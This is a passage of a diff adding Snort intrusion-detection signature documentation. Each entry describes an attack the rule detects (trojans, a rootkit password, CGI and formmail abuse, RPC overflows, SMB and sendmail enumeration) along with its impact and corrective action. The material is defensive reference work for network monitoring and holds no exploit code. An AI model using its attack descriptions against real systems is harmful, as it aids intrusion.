+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
--- /dev/null
+++ b/doc/signatures/932.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1349.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1349
+
+--
+Summary:
+Attempted /bin/python access via web
+
+--
+Impact:
+Attempt to execute a python script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a python script on a host. Python is a scripting language that is available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to Python in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Python may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all python scripts on the host should be written using the restriceted access mode. This forces Python to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1350
+
+--
--- /dev/null
+++ b/doc/signatures/1454.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1454
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server, in this case
+the wwwwais cgi application.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securiteam:
+http://www.securiteam.com/unixfocus/5SP140035A.html
+
+--
--- /dev/null
+++ b/doc/signatures/501.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+501
+
+--
+Summary:
+This event is generated when a packet is discovered with loose source routing set in the IP options.
+
+--
+Impact:
+Loose source routing permits the dictation of a route to and from the destination rather than relying on standard dynamic routing.
+
+--
+Detailed Information:
+Loose source routing instructs the packet to traverse identified routers in transit to and from the desired destination.  Normal routing sends a packet one hop at a time allowing each interim router to determine the next hop.  This may permit an attacker to spoof a source IP yet receive the response by sniffing from a network associated with an identified loose source router.  A vulnerability exist in Windows 95, 98, and NT hosts that permits a vulernable destination host to accept a specially crafted source routed packet even though the host has a registry setting to drop it.
+
+--
+Affected Systems:
+Unless loose source routing is disabled, all hosts can accept them.
+
+--
+Attack Scenarios:
+An attacker can craft a special source routed packet to cause Windows 95, 98, and NT hosts to accept them even though a registry setting exists to drop source routed packets.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+This even will trigger if you allow loose source routed packets into your network.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block all source routed (loose or strict) packets from entering your network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/646
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0909
+
+Whitehats
+www.whitehats.com/info/IDS470
+
+--
--- /dev/null
+++ b/doc/signatures/2921.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2921
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using UDP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+UDP this can result in the attacker causing a stack overflow in named.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/217.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+217
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "hax0r". This is a known password for 
+the sm4ck Linux rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1733.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1733
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rwalld is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rwalld is using.  Attackers can also learn what versions of the rwalld protocol are accepted by rwalld. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rwalld run.  The rwalld RPC service is used by UNIX hosts to send a message to current users on the host.  There is a format string vulnerability associated with rwalld error messages, allowing an attacker to execute abitrary code with the privileges of rwalld, possibly root. According to CERT, this is both a local and remote exploit, but the remote exploit is more difficult to perform.
+
+--
+Affected Systems:
+Sun Solaris 2.5.1, 2.6, 7, and 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rwalld runs.  This may be a precursor to an attack to exploit the rwalld format string vulnerability.
+
+--
+Ease of Attack:
+Easy.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rwalld, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rwalld, not probes of the rwalld service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rwalld service itself. An attacker may attempt to go directly to the rwalld port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-10.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/357.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+357
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1474.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1474
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1391.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1110.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1110
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1384.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1384
+
+--
+Summary:
+This event is generated when a remote user attempts to send a NOTIFY directive to an internal host's Universal Plug and Play (UPnP) server.
+
+--
+Impact:
+Attempted administrator access or denial of service.  A successful attack may cause a denial of service or permit the execution of arbitrary code with administrator privileges.
+
+--
+Detailed Information:
+The UPnP is used to find network-based devices.  Specifically, UPnP NOTIFY directives are employed to advertise the existence of UPnP devices on the network.  A vulnerability exists that permits a malformed NOTIFY directive to cause a buffer overflow on the remote host listening on UPnP.  Alternately, a malformed NOTIFY directive may be used to exhaust resources on a remote host listening on UPnP.  The buffer overflow attack may permit the execution of arbitrary code on the host with administrator privileges.
+
+--
+
+Affected Systems:
+Microsoft Windows 98, 98SE, ME, XP
+
+--
+Attack Scenarios:
+An attacker may obtain craft a malformed NOTIFY directive to cause a denial of service or attempt to execute arbitrary code on the victim host.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+This event will be generated if external hosts are permitted to query for UPnP devices.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound UPnP traffic.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0876
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0877
+
+--
--- /dev/null
+++ b/doc/signatures/1730.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1730
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/516.txt
@@ -0,0 +1,61 @@
+Nigel - added new references to the rule and bumped up revision number.
+Rule:
+
+--
+Sid:
+516
+
+--
+Summary:
+This event is generated when an attempt is made by Simple Network Management Protocol (SNMP) to enumerate Server Message Block (SMB) users on the host.
+
+--
+Impact:
+Reconnaissance.  An attacker may obtain SMB usernames of the remote host. 
+
+--
+Detailed Information:
+Server Message Block is a network file sharing protocol used between Windows hosts and Unix and between Windows hosts that communicate via Samba.  SNMP can be used to query a remote host that listens for SNMP requests and supports SMB, to list the SMB usernames.  This provides reconnaissance of valid usernames and may be followed by a brute force attack to guess passwords.
+
+--
+Affected Systems:
+Hosts that run SMB and listen for SNMP requests.
+
+--
+Attack Scenarios:
+An attacker may obtain a list of current usernames on the remote host as a precursor of attempting a brute force attack to guess passwords of those users.
+
+--
+Ease of Attack:
+A Nessus script exists to list current SMB users.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound SNMP traffic.
+
+Disable SNMP as a listening service on the remote host unless it is required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS333
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10546
+
+--
--- /dev/null
+++ b/doc/signatures/1059.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1059
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/2093.txt
@@ -0,0 +1,86 @@
+Rule:
+
+--
+Sid:
+2093
+
+--
+Summary:
+vulnerability in xdrmem_getbytes used by XDR in RPC portmap services.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdrmem_getbytes) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request can lead to remote system compromise and
+super user access to the target host. Additionally, a denial of service 
+and execution of arbitrary code with the privilege of the super user is 
+also possible.
+
+--
+Affected Systems:
+Multiple vendors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request to the target
+host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7123
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0028
+
+CERT:
+http://www.cert.org/advisories/CA-2003-10.html
+http://www.kb.cert.org/vuls/id/516825
+http://www.kb.cert.org/vuls/id/192995
+
+--
--- /dev/null
+++ b/doc/signatures/100000110.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000110
+
+-- 
+Summary: 
+This event is generated when the Dabber virus attempts to exploit a 
+vulnerability in the FTP server installed by the Sasser virus.
+
+-- 
+
+Impact: 
+If the Sasser virus is currently running on the affected system, then the 
+Dabber virus will be able to install itself as well.
+
+--
+Detailed Information:
+Some variants of the Sasser virus install an FTP server that listens on port 
+5554. However, this FTP server suffers from a buffer overflow in the PORT 
+command, which can be exploited with a command of 100 or more characters. The 
+Dabber virus makes use of this vulnerability as an infection vetor.
+
+--
+Affected Systems:
+Any machine with a variant of the Sasser virus whose FTP server listens on port 
+5554. 
+
+--
+
+Attack Scenarios: 
+A known virus scans the Internet in search of vulnerable systems.
+
+-- 
+
+Ease of Attack: 
+Simple, as the virus is in the wild.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Users should employ a virus removal tool to clean their system of both Dabber 
+and Sasser, and then apply the latest security patches from Microsoft to 
+prevent further infections.
+
+--
+Contributors: 
+Matt Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3330.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3330
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1610.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1610
+
+--
+Summary:
+An attempt to access a script (formmail) in the cgi-bin which has known
+vulnerabilities.
+
+Formmail is a freely available perl script that is used to send data
+collected via a form to specified addresses.
+
+--
+Impact:
+Attempt to gain information about the web-server environment variables.
+Could also be an attempt to execute commands on the web-server that will
+execute with the privilege of the user owning the daemon running the
+server. The script may also be used to relay SPAM or to disclose the
+contents of files on the host.
+
+--
+Detailed Information:
+This could be an attempt to gain intelligence about the web-server that
+might be used to further exploit the machine. The environment variables
+of the web-server might be retrieved and sent via email to an address of
+the attackers choosing. More importantly this could be an attempt to
+execute commands on the web-server. Should this be successful, the
+commands would execute with the privileges of the user owning the httpd daemon.
+
+--
+Attack Scenarios:
+Formmail receives information from a form via an HTTP POST. This
+includes the email addresses to which the form data is sent. A URI in
+the form of a POST to the formmail script could be crafted to send
+environment variables to a specified email address.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Web-servers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. The web-server httpd
+daemon should be run as a non-privileged user without login access to
+the host. The formmail script should be updated to a non-vulnerable
+version as soon as possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1830.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1830
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1446.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1446
+
+--
+Summary:
+This event is generated when an external attacker uses the "vrfy root"
+command to find the login name or mail alias of the system
+administrator. This may also indicate a vulnerability scan.
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+An attacker may be able to obtain the email alias or actual email
+address of root users. This allows the attacker to know which email
+accounts may be more valuable to target, and can be used by spammers or
+as targets for denial of service attempts.
+
+--
+Affected Systems:
+Systems running Sendmail.
+
+--
+Attack Scenarios:
+An attacker uses vrfy root to obtain the name of administrators on the
+server. The attacker now knows which accounts have administrative
+access, and may use this information to focus later attacks.
+
+--
